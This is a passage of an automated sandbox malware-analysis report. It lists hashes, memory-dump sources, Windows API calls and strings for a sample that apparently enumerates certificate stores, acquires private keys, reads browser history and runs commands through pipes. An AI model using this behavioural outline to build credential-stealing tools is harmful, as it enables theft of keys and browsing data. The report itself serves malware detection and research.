                                                                                                                              • Instruction ID: 2ee9b5b78f3a8a8f7fe87b9bb086f9e30f6070a9475737b6819b2c820edb59db
                                                                                                                              • Opcode Fuzzy Hash: 8ec0c6864f41985d24004ca6e018bc4ddce3b9f89499130afec725e7e5dd47f0
                                                                                                                              • Instruction Fuzzy Hash: ECD16C66A08603C4EA84FB6298918F893659F457C4BCC613AFD5F2B796EE3CE105D360
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: sDs$'s)s$?: '
                                                                                                                              • API String ID: 0-2673205255
                                                                                                                              • Opcode ID: b14ef486a98a8d0c38595ec468a9212c7fdf5917905d1a0f68a1baa755f503dd
                                                                                                                              • Instruction ID: 4982e9e953399e4c745b3f65d01d88cec7067bb0930e3c2ec06eed09b36d36e4
                                                                                                                              • Opcode Fuzzy Hash: b14ef486a98a8d0c38595ec468a9212c7fdf5917905d1a0f68a1baa755f503dd
                                                                                                                              • Instruction Fuzzy Hash: EC5283A1B05781C9EB80EFB1C4159FDA7625B467C8BC8503AEE4E3BB8ADE3C9105D750
                                                                                                                              APIs
                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1951,?,?,00000000,00007FF763AF19BA), ref: 00007FF763AF2669
                                                                                                                              • RtlReAllocateHeap.NTDLL(?,?,?,00007FF763AF1951,?,?,00000000,00007FF763AF19BA), ref: 00007FF763AF267A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1357844191-0
                                                                                                                              • Opcode ID: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                                                                              • Instruction ID: ceef8ac31b1d5634e3be52ca727f2f93cbabdc1ac306ba90e9cf776edd1d31cb
                                                                                                                              • Opcode Fuzzy Hash: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                                                                              • Instruction Fuzzy Hash: B2E08619B095C2C1E9CCAB93F9508759121AF4CFC4F8C8035FD4E1B755CE2CD4419610

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Heap$Process$CloseHandleViewlstrlen$ByteCharCreateExistsFreeMappingMultiOpenPathSizeUnmapWide__memcpy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2161876737-0
                                                                                                                              • Opcode ID: 96e8810ecda21be75596d0931c85d720090f045c31f21a3095ee75ac6c5b0b09
                                                                                                                              • Instruction ID: 6e2a9738da6aa6d119d67b6170a4bfe2f0f02a9fb0177d16e4370516ccd25aa4
                                                                                                                              • Opcode Fuzzy Hash: 96e8810ecda21be75596d0931c85d720090f045c31f21a3095ee75ac6c5b0b09
                                                                                                                              • Instruction Fuzzy Hash: 2D31B425A08642C2E7A8EF22A914B39A290FB8DBD4F884234DDDD1BB94EF3CD405C710

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF763AF2D90
                                                                                                                              • CertGetNameStringW.CRYPT32 ref: 00007FF763AF2DD3
                                                                                                                              • CertNameToStrW.CRYPT32 ref: 00007FF763AF2EB8
                                                                                                                              • CertNameToStrW.CRYPT32 ref: 00007FF763AF2F0A
                                                                                                                              • FileTimeToSystemTime.KERNEL32 ref: 00007FF763AF2F4B
                                                                                                                              • FileTimeToSystemTime.KERNEL32 ref: 00007FF763AF2FC1
                                                                                                                                • Part of subcall function 00007FF763AF1A70: wvsprintfW.USER32 ref: 00007FF763AF1AA9
                                                                                                                                • Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
                                                                                                                                • Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF
                                                                                                                              • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF763AF3178
                                                                                                                                • Part of subcall function 00007FF763AF3220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF325E
                                                                                                                                • Part of subcall function 00007FF763AF3220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF763AF328D
                                                                                                                                • Part of subcall function 00007FF763AF3220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF32BB
                                                                                                                                • Part of subcall function 00007FF763AF3220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3336
                                                                                                                                • Part of subcall function 00007FF763AF3220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF763AF2C48), ref: 00007FF763AF3380
                                                                                                                                • Part of subcall function 00007FF763AF3220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF763AF33AC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
                                                                                                                              • String ID: 1.2.840.113549
                                                                                                                              • API String ID: 2787208766-3888290641
                                                                                                                              • Opcode ID: 89e321d8f47db721faaaffbf5bc670e81a38216f7234dbe265e61ac78cf82268
                                                                                                                              • Instruction ID: 8f349b0b7daeaeae467e420d1291669f95facaacea8587b4971b17b806240ad7
                                                                                                                              • Opcode Fuzzy Hash: 89e321d8f47db721faaaffbf5bc670e81a38216f7234dbe265e61ac78cf82268
                                                                                                                              • Instruction Fuzzy Hash: 8AB1A566A08682C5EB94AF52D440ABEE761FB84BC4F840036FE8D27B59DF3CD104DB50

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$lstrcatlstrlen$CloseHandleHeapView__memcpy$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWide
                                                                                                                              • String ID: Default$LOCALAPPDATA$\History
                                                                                                                              • API String ID: 3980575106-3555721359
                                                                                                                              • Opcode ID: 703e2cc27491edb835a702928f8dfd056178b35cb6f4e48980e21a2681ef37d9
                                                                                                                              • Instruction ID: 11e611d777e39210488ae762b8573f0556b25fae798e08d9e00a0910ca6f06ea
                                                                                                                              • Opcode Fuzzy Hash: 703e2cc27491edb835a702928f8dfd056178b35cb6f4e48980e21a2681ef37d9
                                                                                                                              • Instruction Fuzzy Hash: 4E515622E18F85C2D751EF24D5416A87370F798788F45A226DB8D67366EF34E2C8C340

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateErrorLast$Pipe$CloseHandleProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2620922840-0
                                                                                                                              • Opcode ID: 7ed28186285976bbbed012161b1c53923df8aba68a63d871357f64017f65b850
                                                                                                                              • Instruction ID: f28b34449969a272c2e1d1ec05ac892e37f0da6fba7c7402041831ce4b7ba7b3
                                                                                                                              • Opcode Fuzzy Hash: 7ed28186285976bbbed012161b1c53923df8aba68a63d871357f64017f65b850
                                                                                                                              • Instruction Fuzzy Hash: 87517376B08A41C6E790EF71D584BEC63A5AB58788F84003AEE0DABB59DF3CD109D350

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 561 7ff763af9224-7ff763af9306 GetSystemTimeAsFileTime call 7ff763af9a20 * 3 call 7ff763af9a98 call 7ff763af2698 call 7ff763af25dc call 7ff763af7b34 * 4 call 7ff763af971c call 7ff763af25b4 586 7ff763af9309-7ff763af9317 561->586 587 7ff763af9329-7ff763af9330 586->587 588 7ff763af9319-7ff763af931c call 7ff763af968c 586->588 590 7ff763af9332-7ff763af9335 587->590 591 7ff763af938c-7ff763af9393 587->591 594 7ff763af9321-7ff763af9323 588->594 590->591 595 7ff763af9337-7ff763af9351 590->595 592 7ff763af9395-7ff763af9399 call 7ff763af968c 591->592 593 7ff763af93a2-7ff763af93b6 WaitForSingleObject 591->593 601 7ff763af939e-7ff763af93a0 592->601 597 7ff763af93f5 593->597 598 7ff763af93b8-7ff763af93ca GetSystemTimeAsFileTime 593->598 594->587 594->597 599 7ff763af9353-7ff763af9365 call 7ff763af7b50 595->599 600 7ff763af9382-7ff763af9386 595->600 603 7ff763af93f7-7ff763af9417 597->603 598->586 602 7ff763af93d0-7ff763af93e3 call 7ff763af9a98 598->602 610 7ff763af9374-7ff763af9380 599->610 611 7ff763af9367-7ff763af936e 599->611 600->591 605 7ff763af9418-7ff763af942c WaitForSingleObject 600->605 601->593 601->597 602->586 616 7ff763af93e9-7ff763af93ef TerminateProcess 602->616 605->597 608 7ff763af942e-7ff763af9434 605->608 612 7ff763af9436-7ff763af9439 call 7ff763af968c 608->612 613 7ff763af9442-7ff763af9449 608->613 610->599 610->600 611->605 611->610 621 7ff763af943e-7ff763af9440 612->621 614 7ff763af944b-7ff763af944f call 7ff763af968c 613->614 615 7ff763af9458-7ff763af9468 GetExitCodeProcess 613->615 622 7ff763af9454-7ff763af9456 614->622 619 7ff763af9473-7ff763af9475 615->619 620 7ff763af946a-7ff763af9471 615->620 616->597 619->603 620->597 620->619 621->597 621->613 622->597 622->615
                                                                                                                              APIs
                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF763AF924D
                                                                                                                                • Part of subcall function 00007FF763AF25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF763AF1985,?,?,?,00007FF763AF155F), ref: 00007FF763AF25E5
                                                                                                                                • Part of subcall function 00007FF763AF25B4: GetProcessHeap.KERNEL32 ref: 00007FF763AF25C1
                                                                                                                                • Part of subcall function 00007FF763AF25B4: RtlFreeHeap.NTDLL ref: 00007FF763AF25CF
                                                                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF763AF93AB
                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF763AF93C0
                                                                                                                              • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF763AF93EF
                                                                                                                                • Part of subcall function 00007FF763AF968C: PeekNamedPipe.KERNEL32 ref: 00007FF763AF96B8
                                                                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,-00000031), ref: 00007FF763AF9421
                                                                                                                              • GetExitCodeProcess.KERNEL32 ref: 00007FF763AF9460
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
                                                                                                                              • String ID: & echo
                                                                                                                              • API String ID: 2711250446-3491486023
                                                                                                                              • Opcode ID: 016a01f73afbadfa819e5497bcf1e030ae99ddaa61e3bafcda52874dbe721003
                                                                                                                              • Instruction ID: ee36ea4eb2465f04854e5e4680fb7b6b3a103a0e5680e1ef86143d2af7bce444
                                                                                                                              • Opcode Fuzzy Hash: 016a01f73afbadfa819e5497bcf1e030ae99ddaa61e3bafcda52874dbe721003
                                                                                                                              • Instruction Fuzzy Hash: F9515125B09642C1EEA4FF12E554ABAE351FF84B84F88413EEA4E67785DE3CE445D320

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                                                                              • String ID: exit
                                                                                                                              • API String ID: 1626563136-1626635026
                                                                                                                              • Opcode ID: e9e34274aeea68a913adea50c2b43826d043e5256863e9948eb928a6b09cc203
                                                                                                                              • Instruction ID: a47c0bbd9797111546a3e7b6e6e3bf04e8e46aa1223e42bf84363952bb1fe5ec
                                                                                                                              • Opcode Fuzzy Hash: e9e34274aeea68a913adea50c2b43826d043e5256863e9948eb928a6b09cc203
                                                                                                                              • Instruction Fuzzy Hash: 1D31A025A08502C1EBD4FF24D550A7DA361EF88B88FCC103AFA4E96399DF2CD849D720

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Cert$NameStore$CertificatesCloseEnumOpenString
                                                                                                                              • String ID: *sms$gszs$zszs
                                                                                                                              • API String ID: 3617724111-4219868587
                                                                                                                              • Opcode ID: a3fe3b844ec616656594b77919c06264c151e8813e30518a5e839789af4a8af6
                                                                                                                              • Instruction ID: eea1af6c7bd9f6554b3105daf3e45681351d11b3e848b4725f9adad9c73a4b3b
                                                                                                                              • Opcode Fuzzy Hash: a3fe3b844ec616656594b77919c06264c151e8813e30518a5e839789af4a8af6
                                                                                                                              • Instruction Fuzzy Hash: 5721A976A186C1C1E790EF16E4506AAE361FB84B80F889036FE8E5B759DF3CD405C750

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Enum$CloseOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1701607978-0
                                                                                                                              • Opcode ID: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
                                                                                                                              • Instruction ID: 70d28d5ca4c6e9369d7d1b3b1b606c8bbfe1ccafb8c27f51a30fcc807a15f400
                                                                                                                              • Opcode Fuzzy Hash: fcc6f3c639ec119cf7856154b92cbb5a973dd3f81707c5291cfa5e09fa2fda6b
                                                                                                                              • Instruction Fuzzy Hash: FB215832618B8582D3108F12E484B6AB7B8F788B84F594226EA8C57B18DF3DD559CB00

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CertEnumStoreSystem
                                                                                                                              • String ID: ":{$"_":""
                                                                                                                              • API String ID: 4132996702-2026347918
                                                                                                                              • Opcode ID: bde7b9d95764b4a748e3e44d944acbe1370a7a94fc7036fd8cfb648fe9c63810
                                                                                                                              • Instruction ID: 7fde9ebdfdf3720b3675412003d307e75fb534ecaa10602f2cda655d57a28751
                                                                                                                              • Opcode Fuzzy Hash: bde7b9d95764b4a748e3e44d944acbe1370a7a94fc7036fd8cfb648fe9c63810
                                                                                                                              • Instruction Fuzzy Hash: 89016255E08642C1FA88FB56A4408B9D355AF88BC4FCC9036FD9E6B75A9F3CD142C750

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Initialize$CreateInstanceSecurity
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 89549506-0
                                                                                                                              • Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                                                              • Instruction ID: 1048554f46eb8fd0d7974ca55acc73ed50e0dcc7fb5aa4c9a7d6a310853dcfe4
                                                                                                                              • Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                                                              • Instruction Fuzzy Hash: D2118C73A14640DAF3109F71E8597AE7774F34870DF548218EA492AA58CF3CD245CB94
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CertEnumLocationStoreSystem
                                                                                                                              • String ID: "_": ""
                                                                                                                              • API String ID: 863500693-1453221996
                                                                                                                              • Opcode ID: 6b21618263e360399a06e9a6e29e51c669755cc20520e873ad7292844cdbbc9a
                                                                                                                              • Instruction ID: 67f090edbc8ebfa8a83711c077bdc5efc2cb4ed9469e20e186a7a82e7de3661c
                                                                                                                              • Opcode Fuzzy Hash: 6b21618263e360399a06e9a6e29e51c669755cc20520e873ad7292844cdbbc9a
                                                                                                                              • Instruction Fuzzy Hash: 79E06D89B18543C0EEC8BB62A8518F493149F487C0FCC6037F85F2A356EE2CD089C360
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Value$HeapProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3133723474-0
                                                                                                                              • Opcode ID: a28c24243887c53b92bd3dd9b02b70499d59a5de783e5fc6fd81f97936264431
                                                                                                                              • Instruction ID: 45452b6573a4df171a066902fd642445eed8bf895b2db116328d5f3cf8bb4d12
                                                                                                                              • Opcode Fuzzy Hash: a28c24243887c53b92bd3dd9b02b70499d59a5de783e5fc6fd81f97936264431
                                                                                                                              • Instruction Fuzzy Hash: 0F117C36718B81C6D750DF12E48489EB3A9FB88B80B994139EF9C57B14DF39D915CB10
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4178207665.00007FF763AF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF763AF0000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4178165861.00007FF763AF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178252175.00007FF763B01000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178293559.00007FF763B04000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4178366608.00007FF763B05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_7ff763af0000_451E.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileNamedPeekPipeRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 327342812-0
                                                                                                                              • Opcode ID: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
                                                                                                                              • Instruction ID: e7e9611f8977c7ca78dfeaa69a902d7cda97458b390f4681e75209c74e083765
                                                                                                                              • Opcode Fuzzy Hash: 7f115bf4007d67bfdfc29d9dfe0ac2456264c6eed9dcc6533d655e64355cf705
                                                                                                                              • Instruction Fuzzy Hash: C0018032B18682C3E790AF56E504B7AE3A1EB85BD4F584139EA4C4B754DF7CD444CB50
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
